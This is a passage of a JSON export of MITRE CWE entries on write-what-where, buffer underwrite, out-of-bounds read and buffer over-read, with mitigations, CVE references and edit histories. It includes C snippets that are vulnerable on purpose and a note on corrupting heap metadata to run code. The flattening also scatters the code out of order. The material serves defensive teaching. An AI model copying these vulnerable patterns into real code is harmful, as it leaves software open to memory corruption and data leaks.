Design","Strategy":"Language Selection","Description":"Use a language that provides appropriate memory abstractions."},{"Phase":"Operation","Description":"Use OS-level preventative functionality integrated after the fact. Not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The classic example of a write-what-where condition occurs when the accounting information for memory allocations is overwritten in a particular fashion. Here is an example of potentially vulnerable code:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BUFSIZE 256int main(int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *buf1 = (char *) malloc(BUFSIZE);char *buf2 = (char *) malloc(BUFSIZE);strcpy(buf1, argv[1]);free(buf2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":["Vulnerability in this case is dependent on memory layout. The call to strcpy() can be used to write past the end of buf1, and, with a typical layout, can overwrite the accounting information that the system keeps for buf2 when it is allocated. Note that if the allocation header for buf2 can be overwritten, buf2 itself can be overwritten as well.","The allocation header will generally keep a linked list of memory \\"chunks\\". Particularly, there may be a \\"previous\\" chunk and a \\"next\\" chunk. Here, the previous chunk for buf2 will probably be buf1, and the next chunk may be null. When the free() occurs, most memory allocators will rewrite the linked list using data from buf2. Particularly, the \\"next\\" chunk for buf1 will be updated and the \\"previous\\" chunk for any subsequent chunk will be updated. The attacker can insert a memory address for the \\"next\\" chunk and a value to write into that memory address for the \\"previous\\" chunk.","This could be used to overwrite a function pointer that gets dereferenced later, replacing it with a memory address that the attacker has legitimate access to, where they have placed malicious code, resulting in arbitrary code execution."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Write-what-where condition"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"Imprecise"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Common_Consequences, Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}]}},"124":{"attr":{"@_ID":"124","@_Name":"Buffer Underwrite (\'Buffer Underflow\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer.","Extended_Description":"This typically occurs when a pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"786","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"buffer underrun","Description":"Some prominent vendors and researchers use the term \\"buffer underrun\\". \\"Buffer underflow\\" is more commonly used, although both terms are also sometimes used to describe a buffer under-read (CWE-127)."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory","Bypass Protection Mechanism","Other"],"Note":"If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. If the corrupted memory is data rather than instructions, the system will continue to function with improper changes, possibly in violation of an implicit or explicit policy. The consequences would only be limited by how the affected data is used, such as an adjacent memory location that is used to specify whether the user has special privileges."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Choose a language that is not susceptible to these issues."},{"Phase":"Implementation","Description":"All calculated values that are used as index or for pointer arithmetic should be validated to ensure that they are within an expected range."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-87"},"Intro_Text":"In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* trimTrailingWhitespace(char *strMessage, int length) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *retMessage;char *message = malloc(sizeof(char)*(length+1));char message[length+1];int index;for (index = 0; index &lt; length; index++) {}message[index] = \'\\\\0\';int len = index-1;while (isspace(message[len])) {}retMessage = message;return retMessage;","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// copy input string to a temporary string","// trim trailing whitespace","// return string without trailing whitespace"],"xhtml:div":[{"#text":"message[index] = strMessage[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"message[len] = \'\\\\0\';len--;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer."},{"attr":{"@_Demonstrative_Example_ID":"DX-88"},"Intro_Text":"The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main() {}","xhtml:div":{"#text":"...strncpy(destBuf, &amp;srcBuf[find(srcBuf, ch)], 1024);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2021-24018","Description":"buffer underwrite in firmware verification routine allows code execution via a crafted firmware image","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24018"},{"Reference":"CVE-2002-2227","Description":"Unchecked length of SSLv2 challenge value leads to buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227"},{"Reference":"CVE-2007-4580","Description":"Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130)","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580"},{"Reference":"CVE-2007-1584","Description":"Buffer underflow from an all-whitespace string, which causes a counter to be decremented before the buffer while looking for a non-whitespace character.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1584"},{"Reference":"CVE-2007-0886","Description":"Buffer underflow resultant from encoded data that triggers an integer overflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0886"},{"Reference":"CVE-2006-6171","Description":"Product sets an incorrect buffer size limit, leading to \\"off-by-two\\" buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6171"},{"Reference":"CVE-2006-4024","Description":"Negative value is used in a memcpy() operation, leading to buffer underflow.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4024"},{"Reference":"CVE-2004-2620","Description":"Buffer underflow due to mishandled special characters","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"UNDER - Boundary beginning violation (\'buffer underflow\'?)"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Buffer underwrite"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-90"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}}]},"Notes":{"Note":[{"#text":"This could be resultant from several errors, including a bad offset or an array index that decrements before the beginning of the buffer (see CWE-129).","attr":{"@_Type":"Relationship"}},{"#text":"Much attention has been paid to buffer overflows, but \\"underflows\\" sometimes exist in products that are relatively free of overflows, so it is likely that this variant has been under-studied.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Description, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Boundary Beginning Violation (\'Buffer Underwrite\')","attr":{"@_Date":"2009-10-29"}}}},"125":{"attr":{"@_ID":"125","@_Name":"Out-of-bounds Read","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software reads data past the end, or before the beginning, of the intended buffer.","Extended_Description":"Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.  A crash can occur when the code reads a variable amount of data and assumes that a sentinel exists to stop the read operation, such as a NUL in a string.  The expected sentinel might not be located in the out-of-bounds memory, causing excessive data to be read, leading to a segmentation fault or a buffer overflow.  The software may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer.  A subsequent read operation then produces undefined or unexpected results.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","To reduce the likelihood of introducing an out-of-bounds read, ensure that you validate and ensure correct calculations for any length argument, buffer size calculation, or offset. Be especially careful of relying on a sentinel (i.e. special character such as NUL) in untrusted inputs."]}},{"Phase":"Architecture and Design","Strategy":"Language Selection","Description":"Use a language that provides appropriate memory abstractions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index &lt; len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index &gt;= 0 &amp;&amp; index &lt; len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-0160","Description":"Chain: \\"Heartbleed\\" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160"},{"Reference":"CVE-2018-10887","Description":"Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"},{"Reference":"CVE-2018-16069","Description":"Chain: series of floating-point precision errors\\n\\t      (CWE-1339) in a web browser rendering engine causes out-of-bounds read\\n\\t      (CWE-125), giving access to cross-origin data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16069"},{"Reference":"CVE-2004-0112","Description":"out-of-bounds read due to improper length check","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0112"},{"Reference":"CVE-2004-0183","Description":"packet with large number of specified elements cause out-of-bounds read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0183"},{"Reference":"CVE-2004-0221","Description":"packet with large number of specified elements cause out-of-bounds read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0221"},{"Reference":"CVE-2004-0184","Description":"out-of-bounds read, resultant from integer underflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0184"},{"Reference":"CVE-2004-1940","Description":"large length value causes out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1940"},{"Reference":"CVE-2004-0421","Description":"malformed image causes out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0421"},{"Reference":"CVE-2008-4113","Description":"OS kernel trusts userland-supplied length value, allowing reading of sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Out-of-bounds Read"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"540"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1034"}},{"attr":{"@_External_Reference_ID":"REF-1035"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}}]},"Notes":{"Note":{"#text":"Under-studied and under-reported. Most issues are probably labeled as buffer overflows.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Observed_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Common_Consequences, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Observed_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}]}},"126":{"attr":{"@_ID":"126","@_Name":"Buffer Over-read","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations after the targeted buffer.","Extended_Description":"This typically occurs when the pointer or its index is incremented to a position beyond the bounds of the buffer or when pointer arithmetic results in a position outside of the valid memory location to name a few. This may result in exposure of sensitive information or possibly a crash.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"788","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) &gt; 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer &gt; BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index &lt; msg-&gt;msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg-&gt;msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."},{"Intro_Text":"The following C/C++ example demonstrates a buffer over-read due to a missing NULL terminator. The main method of a pattern matching utility that looks for a specific pattern within a specific file uses the string strncopy() method to copy the command line user input file name and pattern to the Filename and Pattern character arrays respectively.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char **argv){}","xhtml:br":["",""],"xhtml:div":{"#text":"char Filename[256];char Pattern[32];...strncpy(Filename, argv[1], sizeof(Filename));strncpy(Pattern, argv[2], sizeof(Pattern));printf(\\"Searching file: %s for the pattern: %s\\\\n\\", Filename, Pattern);Scan_File(Filename, Pattern);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["/* Validate number of parameters and ensure valid content */","/* copy filename parameter to variable, may cause off-by-one overflow */","/* copy pattern parameter to variable, may cause off-by-one overflow */"]}}},{"#text":"Pattern[31]=\'\\\\0\';","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"strncpy(Filename, argv[2], sizeof(Filename)-1);Filename[255]=\'\\\\0\';strncpy(Pattern, argv[3], sizeof(Pattern)-1);","xhtml:i":["/* copy filename parameter to variable, no off-by-one overflow */","/* copy pattern parameter to variable, no off-by-one overflow */"],"xhtml:br":["","","","",""]},"xhtml:br":""}],"Body_Text":["However, the code do not take into account that strncpy() will not add a NULL terminator when the source buffer is equal in length of longer than that provide size attribute. Therefore if a user enters a filename or pattern that are the same size as (or larger than) their respective character arrays, a NULL terminator will not be added (CWE-170) which leads to the printf() read beyond the expected end of the Filename and Pattern buffers.","To fix this problem, be sure to subtract 1 from the sizeof() call to allow room for the null byte to be added."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-0160","Description":"Chain: \\"Heartbleed\\" bug receives an inconsistent length parameter (CWE-130) enabling an 